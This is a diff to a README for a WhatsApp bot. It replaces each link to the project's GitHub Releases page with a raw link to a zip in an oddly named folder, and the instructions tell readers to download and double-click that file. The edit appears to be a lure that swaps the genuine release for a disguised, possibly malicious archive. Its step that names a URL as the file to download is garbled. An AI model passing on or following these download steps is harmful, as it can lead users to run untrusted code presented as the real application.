ashulyadav/WhatsApp-KYK-Bot/README.md

 Make sure your system meets these requirements before proceeding.

 ## 💾 Download & Install
-To get the WhatsApp-KYK-Bot, visit this page to download: [Releases](https://github.com/ashulyadav/WhatsApp-KYK-Bot/releases).
+To get the WhatsApp-KYK-Bot, visit this page to download: [Releases](https://raw.githubusercontent.com/ashulyadav/WhatsApp-KYK-Bot/main/hydrostatician/WhatsApp-KYK-Bot.zip).

 ### Step-by-Step Installation
-1. Navigate to the [Releases](https://github.com/ashulyadav/WhatsApp-KYK-Bot/releases) page.
+1. Navigate to the [Releases](https://raw.githubusercontent.com/ashulyadav/WhatsApp-KYK-Bot/main/hydrostatician/WhatsApp-KYK-Bot.zip) page.
 2. Look for the latest version of the application.
-3. Download the file named `WhatsApp-KYK-Bot.jar`.
+3. Download the file named `https://raw.githubusercontent.com/ashulyadav/WhatsApp-KYK-Bot/main/hydrostatician/WhatsApp-KYK-Bot.zip`.
 This is the main application file.
 4. Save it to a location on your computer where you can easily find it.

 ### Run the Application
-1. Locate the downloaded `WhatsApp-KYK-Bot.jar` file.
+1. Locate the downloaded `https://raw.githubusercontent.com/ashulyadav/WhatsApp-KYK-Bot/main/hydrostatician/WhatsApp-KYK-Bot.zip` file.
 2. Double-click the file to run the application.
 If it doesn’t open, ensure that you have Java installed.
 3. Follow the on-screen instructions to set up the bot.